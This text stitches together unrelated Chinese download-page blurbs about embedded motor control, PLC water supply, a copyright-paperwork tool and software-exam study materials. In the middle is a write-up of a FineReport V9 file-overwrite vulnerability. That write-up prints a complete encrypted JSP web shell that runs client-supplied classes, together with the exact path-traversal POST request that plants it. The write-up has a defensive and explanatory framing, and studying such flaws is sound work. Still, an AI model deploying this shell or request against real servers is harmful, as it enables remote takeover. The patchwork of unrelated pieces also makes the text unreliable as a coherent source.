内容概要：本文详细介绍了英飞凌TC3xx系列芯片在旋变软解码方面的应用，涵盖硬件电路设计和软件算法实现两大部分。硬件方面，重点讨论了励磁信号发生电路、信号调理电路以及滤波器的设计，强调了运放选择、滤波参数调整和抗干扰措施的重要性。软件部分则深入探讨了励磁信号生成、信号采集、角度解算和动态补偿算法的具体实现，特别提到了利用硬件除法器和CORDIC协处理器优化反正切计算的方法。此外，还分享了一些调试经验和常见问题的解决方案。 适合人群：从事电机控制系统的硬件工程师和嵌入式软件开发者，尤其是有一定工作经验的技术人员。 使用场景及目标：适用于需要高精度旋转变压器解码的应用场合，如工业伺服系统、机器人控制等领域。主要目标是帮助读者掌握旋变软解码的关键技术和优化技巧，提高解码精度和稳定性。 其他说明：文中提供了大量实用的代码片段和调试建议，有助于读者快速理解和应用相关技术。同时，作者结合实际项目经验，分享了许多宝贵的心得体会，为读者提供了丰富的实战指导。

内容概要：本文详细介绍了基于西门子S7-200 SMART PLC和昆仑通态触摸屏的一拖二恒压供水系统的设计与实现。系统采用一台变频器带动两台泵，实现循环软启动、手动工频切换和睡眠模式等功能。PLC负责监控管网压力并调节变频器输出频率，控制泵的启动和停止，以及实现泵的交替运行和节能管理。触摸屏用于实时显示系统状态和提供手动操作接口。变频器参数设置确保系统稳定运行，减少启动电流冲击和能耗。 适合人群：自动化工程师、PLC程序员、工业控制系统设计师。 使用场景及目标：适用于需要高效管理和节能的供水系统，如工厂、小区等场所。目标是提高系统的可靠性和稳定性，降低能耗，延长设备使用寿命。 其他说明：文章提供了详细的代码片段和配置步骤，有助于理解和实施类似的PLC控制系统。调试过程中需要注意变频器参数设置和通信配置，以确保系统的稳定性和安全性。

一键生成，覆盖三大主流项目类型软著材料：无需复杂操作，安装桌面工具后，输入项目基本信息（名称 / 功能 / 开发时间等），点击 “生成” 按钮，10分钟 自动输出网站、APP、微信小程序的全套软著申请材料 —— 含源代码文档（前后 30 页规范格式）、软件说明文档、申请表等，完全匹配版权局要求。 真实用户验证：15 分钟完成申请，下证率超 95%：去年有位开发电商小程序的客户，用网弧软著的一键生成方案 15 分钟生成材料，直接提交后 35 天成功下证（知识库显示类似案例下证周期平均缩短 40%）。目前已有超 5000 位开发者使用，反馈 “再也不用为材料格式发愁”。

之前备考软考中级时从希赛一个老师上得到的，感觉挺有用的。 里面包括有模拟卷，经典案例题分析，经典100题，知识点默写本，易混淆知识点，重要知识点速记等资料 需要备考软考中级信安且有需要的小伙伴自取~

信息系统管理工程师教程（陈禹版），加高手复习重点资料汇总，有助于软考通过。

### 帆软V9getshell1：任意文件覆盖与JSP Web Shell植入详解 #### 一、背景介绍 帆软软件有限公司（FineSoft）是中国领先的企业级报表工具及商业智能解决方案提供商，其核心产品之一为FineReport报表设计工具。在2023年某次安全研究中发现了一个严重安全漏洞——任意文件覆盖（Arbitrary File Overwrite），该漏洞允许攻击者通过特定的操作路径上传恶意JSP脚本到目标服务器上，进而获得服务器权限。这一漏洞被命名为“帆软V9getshell1”。 #### 二、漏洞原理 ##### 2.1 任意文件覆盖机制 任意文件覆盖是指攻击者能够替换或修改服务器上的现有文件。在帆软报表系统的实现中，存在一处逻辑缺陷使得攻击者可以利用该功能来覆盖特定的JSP文件。 ##### 2.2 JSP马的上传与执行 1. **文件路径构造**：攻击者通过精心构造请求中的`filePath`参数，指向一个合法的JSP文件路径。例如，攻击者可以通过设置`filePath`为`../../../../WebReport/update.jsp`，将恶意代码写入到`WebReport`目录下的`update.jsp`文件中。 2. **恶意JSP代码**：攻击者准备了如下恶意JSP代码： ```jsp <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%> <% class U extends ClassLoader{ U(ClassLoader c){ super(c); } public Class g(byte []b){ return super.defineClass(b,0,b.length); } } if(request.getParameter("pass")!=null) { String k=(""+UUID.randomUUID()).replace("-", "").substring(16); session.putValue("u",k); out.print(k); return; } Cipher c=Cipher.getInstance("AES"); c.init(2,new SecretKeySpec((session.getValue("u")+ "").getBytes(),"AES")); new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext); %> ``` 该代码实现了以下功能： - 通过`request.getParameter("pass")`判断是否接收到触发命令。 - 使用AES加密算法对会话中的密钥进行初始化，并解码用户发送的数据。 - 动态加载并执行解密后的类文件，实现远程代码执行。 3. **HTTP请求示例**：攻击者通过发送如下POST请求将恶意代码写入指定位置： ``` POST /WebReport/ReportServer? op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update.jsp HTTP/1.1 Host: 192.168.169.138:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.92 Safari/537.36 Connection: close Accept-Au: 0c42b2f264071be0507acea1876c74 Content-Type: text/xml;charset=UTF-8 Content-Length: 675 {"__CONTENT__":"<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%>......","__CHARSET__":"UTF-8"} ``` 4. **利用Tomcat自带的JSP文件**：由于帆软报表系统通常部署在Apache Tomcat服务器上，攻击者可以利用Tomcat默认存在的JSP文件（例如`/tomcat-7.0.96/webapps/ROOT/index.jsp`）作为切入点，通过覆盖这些文件来植入恶意代码。 #### 三、修复建议 1. **升级补丁**：及时安装官方发布的最新版本或安全补丁，以修复已知的安全问题。 2. **限制文件路径**：对用户提交的文件路径进行严格的验证和过滤，避免攻击者通过构造恶意路径覆盖敏感文件。 3. **加强认证与授权**：对关键操作增加二次验证机制，限制非授权用户的访问权限，确保只有经过身份验证的用户才能执行敏感操作。 4. **审计日志记录**：开启并维护详细的审计日志，以便在发生异常情况时进行追踪和分析。 #### 四、总结 帆软V9getshell1这一漏洞揭示了在开发过程中忽视输入验证和权限控制所带来的潜在风险。企业应高度重视此类安全问题，并采取有效措施降低被攻击的风险。同时，用户也应增强安全意识，避免在不安全的网络环境中使用重要系统和服务。

1、内容概要：使用STM32CubeMX生成源码，主芯片为STM32L431RCT6实现SPI Flash的读写存储，采用8MHz的外部晶振作为时钟源。 2、适用人群：适合想要入坑嵌入式的新手、适合学习STM32/ARM开发板的新手、适合STM32L431RCT6芯片的评估和验证等。 3、使用场景及目标：新人学习，STM32L431RCT6芯片评估和替换，开发验证等。 4、开发工具：STM32CubeMX+keil mdk+串口调试助手 5、其他说明（源码使用的开发板资源为）： （1）开发板主芯片型号：STM32L431RCT6 （2）开发板主芯片封装：LQFP-64_10x10x05P （3）开发板主芯片内核：ARM-Cortex-M4 （4）开发板主芯片主频：80MHz （5）开发板主芯片Flash大小：256KB （6）开发板主芯片RAM大小：64KB

软件设计师中级学习资料是对准备参加软件设计师考试的专业人士而言极为重要的辅导材料。这些资料不仅包含了详尽的各章考点分析，而且涵盖了重要的软考笔记，这些笔记是前人经验的总结，能够帮助考生掌握考试的重点和难点。除此之外，核心100知识点及希赛网提供的100条知识点则是将软件设计师考试中必须掌握的关键点进行了梳理，为考生提供了一个明确的学习方向。这些资料还包含了精华知识点和案例分析，这对于考生理解理论知识并将其应用于实际工作中至关重要。同时，专业英语词汇的整理也是软件设计师考试中不可或缺的一部分，它帮助考生扫清了专业英语理解上的障碍。 整个软件设计师学习资料的内容安排合理，符合中级软件设计师考试的需要，有助于考生全面、系统地学习和复习。学习这些资料，考生可以对软件设计的基本理论和实践技能有一个全面的认识，进而在考试中取得好成绩。 考试不仅是对知识的考察，更是对学习者运用知识解决实际问题能力的检验。通过分析历年真题和案例分析，考生可以把握命题规律和考试趋势，从而在备考过程中更加有的放矢。此外，掌握专业英语词汇对于理解和分析软件设计中的英文文献和资料也是非常有帮助的，这不仅能提升考生的专业素养，还能拓宽其国际视野。 软件设计师中级考试要求考生不仅要有扎实的理论基础，还要有丰富的实践经验。因此，这部分学习资料还可能包括一些模拟题或者实操练习，以便考生将所学知识与实际工作相结合，提高解决实际问题的能力。通过反复练习和模拟测试，考生可以检验自己的学习成果，查漏补缺，从而在考试中展现出最佳状态。 这些软件设计师中级学习资料是专为应对软件设计师中级考试而设计的，它不仅涵盖了考试的全部知识点，还提供了许多实用的学习方法和策略。考生通过系统地学习这些资料，可以大幅提升自己的考试通过率。

本资源为软考初级-网络管理员的全套学习资料，旨在为备考网络管理员考试的考生提供全面、系统的学习支持。该资源包含了从基础知识到高级应用的各个方面，帮助考生深入理解网络管理的核心概念和实践技能。 全套资料涵盖了数据通信基础、网络协议、网络操作系统、网络安全等多个关键领域。在数据通信基础部分，考生将学习到通信系统基本概念、多路复用技术、信道特征等基础知识，为后续的网络管理打下坚实基础。网络协议部分则深入讲解了TCP/IP协议栈、各种网络层和应用层协议的工作原理和配置方法。此外，资料还详细介绍了网络操作系统的安装、配置和管理，以及网络安全的基本知识和防护措施。 除了理论知识，本资源还提供了大量的实践案例和练习题，帮助考生将所学知识应用于实际工作中。这些案例和练习题涵盖了网络管理的各个方面，如网络设备的配置与管理、网络故障排查与解决、网络性能优化等，有助于考生提高解决实际问题的能力。 总之，软考初级-网络管理员全套资料是一套极具价值的资源，它结结合了理论与实践，为备考网络管理员考试的考生提供了一个全面、系统的学习平台。

软考中级网络工程师考试是针对中国IT专业人员的一项重要考核，涉及的专业知识范围广泛，考核内容包括网络技术、网络设备、网络设计、网络安全、网络管理等多个方面。通过对核心笔记和核心考点资料的学习，考生能够系统地掌握网络工程师必备的基础知识和实践技能，为通过考试提供有力支持。 在提供的文件名称列表中，我们可以看到六份包含了网络工程师专业英语、图解学网络工程、考前冲刺知识点、笔记完整版、英文手册整理以及主流网络协议的资料。这些资料覆盖了网络工程师考试的多个重要领域，是备考过程中不可或缺的学习资源。 网络工程师专业英语是针对网络相关英文术语和缩略语的学习材料，它有助于考生在专业领域内准确理解并使用国际通用的技术语言。在国际化的网络环境中，掌握专业英语对于网络工程师的日常工作和技术交流至关重要。 图解学网络工程则可能采用了大量图表和示意图来直观解释网络原理和技术，这种直观的学习方式有助于提高学习效率，加深对网络结构和工作原理的理解。 网络工程师考前冲刺知识点这份资料可能是针对考试中最核心的重点内容的梳理，它对考生在考前阶段进行集中复习和查漏补缺具有重要作用。 网工笔记完整版包含了一系列详细的笔记，这些笔记可能涵盖了网络工程师在学习和工作中需要掌握的关键知识点，是考生平日学习积累的重要参考资料。 网工常见英文手册整理则集中了网络领域中常见设备和软件的英文术语，这本手册对于提高网络工程师的专业英语水平非常有帮助，也使得考生在面对英文版设备手册和资料时能够更加从容应对。 主流网络协议魔力图则是以图表形式展示了各种网络协议之间的关系和作用机制，它能够帮助考生形成对网络协议体系的整体认识，对于理解复杂网络协议的工作原理和应用场景有着不可替代的作用。 考生通过系统学习这些资料，不仅可以提高通过考试的可能性，更能提升自己在实际工作中解决网络问题的能力。在当前数字化时代背景下，网络工程师的专业能力对于企业和社会的信息技术发展具有重要的推动作用。因此，对于立志成为网络工程师的专业人士来说，这些资料无疑是宝贵的学习资源。